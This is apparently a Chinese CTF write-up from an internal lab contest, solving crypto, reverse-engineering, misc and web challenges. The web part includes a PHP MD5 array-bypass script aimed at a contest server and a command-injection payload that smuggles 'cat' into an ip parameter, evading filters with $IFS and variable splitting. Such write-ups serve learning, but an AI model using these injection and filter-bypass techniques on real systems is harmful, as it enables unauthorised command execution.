後浪杯CTF-WP

實驗室內部舉行的24小時考覈賽

CRYPTO

1.CRYPTO-warmup

題目:

R1EzREVNWlZHTVpVR05KWkdVWkRLUUpXR0VaRUNNWlFHWkFUR1FaV0lFM1RDTkpZR1JEREdPSlRJSVpUQ05TQ0dSQ0RPUkJUR01aRUlOU0VHTTNETVJSVElNMkRHTkNH

解碼順序:base64-base32-base16-base92

2.佛曰

題目:

夷殿般須兜我莊阿殿亦殿彌婆若菩須咒我阿斯祗如嘇眾殿般殿菩慧尊般尊囉斯色耨阿耨慧宣咒嚤菩降降即殿叻囉我劫吽殿降隸蜜諦薩夷宣色願空喼嚤嚤降諦婆殿尊嚩嚩叻斯婆宣殿慧殿陀斯殿嘚殿斯訶叻願訶菩阿修嚤殿喼是心莊願嚩吒彌慧心我所吒諸婆愍菩缽僧叻殿諸殿祗聞若般阿尊眾諦嘚蜜嚴即若慧蜜蜜喼吶莊劫般嘚嚤婆喃諦若殿如嚴囉殿阿我慧嘚蜜婆愍

佛曰就想到了與佛論禪,但是這個似乎是plus版本
工具:新約佛論禪l
先佛曰解碼再熊曰就行

3.babyRSA

題目:
在這裏插入圖片描述
這道RSA是已知e、n、c解密

思路:分解n得到p和q,通過歐拉函數可以得到d,再通過e、n、c、d求得明文

首先轉換進制

n = int(str1)
print("n=\n%s"%n)

可以得到進制轉換後的e、n、c
分解n:分解大素數工具
直接腳本一跑就可以得到flag
在這裏插入圖片描述

4.hard_crypto

題目:

Life had a lot of things is futile, but we still want to experience. 
key:ADGNWQGM 
str:QRCISUTIZJCPWYWXGZIGMISGMZBXI 
提交flag格式:flag{xxxx}

看到這樣的key和密文,可以想到多表代換,而期中最經典常用的就是維吉尼亞密碼了
通過維吉尼亞密碼我們可以得到這一串密文

QOWVWENWZGWCAIQLGWCTQSMUMWVKM

這個密文再使用凱撒密碼解密(位移:8)就可以得到flag了

5.aes

題目:在這裏插入圖片描述
這道題我覺得實在是太坑了,因爲AES如果有key,其實在線都可以解,但是一開始我不知道key在哪裏,甚至覺得沒有key,最後發現key原來就是文件名,最後直接在線解在這裏插入圖片描述
得到這一串url編碼,可以轉成一張二維碼,掃碼可以得到flag

REVERSE

1.BabyRe

放到IDA,彙編是16進制的
在這裏插入圖片描述

chr(int('66',16))+chr(int('6C',16))+chr(int('61',16))+chr(int('67',16))+chr(int('7b',16))+chr(int('52',16))+chr(int('65',16))+chr(int('5f',16))+chr(int('31',16))+chr(int('73',16))+chr(int('5f',16))+chr(int('53',16))+chr(int('30',16))+chr(int('5f',16))+chr(int('43',16))+chr(int('30',16))+chr(int('4f',16))+chr(int('4c',16))+chr(int('7d',16))

轉十進制可以得到flag

2.HelloCTF

放入IDA
在這裏插入圖片描述
轉ascii碼
在這裏插入圖片描述

3.insanity

這道題主要是一個大佬的博客給了我靈感

strings insanity | grep "flag"

MISC

1.真簽到

題目是一張動圖,動圖轉化爲jpg可以在最後一張得到一個二維碼
在這裏插入圖片描述
掃碼得flag

2.寶可夢二代

下載以後玩寶可夢遊戲,會有提示去103公路看看
103公路的草叢就是flag,很有意思

WEB

1.爆破

value = $_REQUEST[‘value’];可以看出PHP將值保存到value中,即xxx.php?value=x

由if判斷條件看出
SESSION[‘whoami’]應與value的第1第2個字符相同(即value=eaxxxx),並且進行MD5加密(但是數組類型不進行MD5加密)

最後的if得出需要經過11次才能顯示flag

上腳本

import requests
url = "http://47.102.141.139:28079/?value[]=ea"
s = requests.session()
r = s.get(url)
for i in range(15):
    url = "http://47.102.141.139:28079//?value[]=" + r.content[0:2]
    r = s.get(url)
    print r.content

在這裏插入圖片描述

2.command???

看到command會想到命令執行

?ip=127.0.0.1|ls

在這裏插入圖片描述
可以看到flag.php,但是直接cat是不行的,空格和關於flag的都被過濾了

嘗試將flag分開寫(就不會匹配到)
同時覆蓋a變量

Payload:?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php

flag就在源碼註釋裏
在這裏插入圖片描述

寫在最後的

經過在實驗室大半年的學習,我有幸能夠成爲一名正式成員,我真的非常感激。感激學長們對我的教導,讓我成長的很快;感激實驗室的每一位成員,和大家一起學習、一起喝奶茶我非常開心;也感激自己沒有放棄,在學習過程中我有時候覺得好累啊,有時候也會很迷茫,但是還好都堅持下來了,繼續努力吧!加油

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章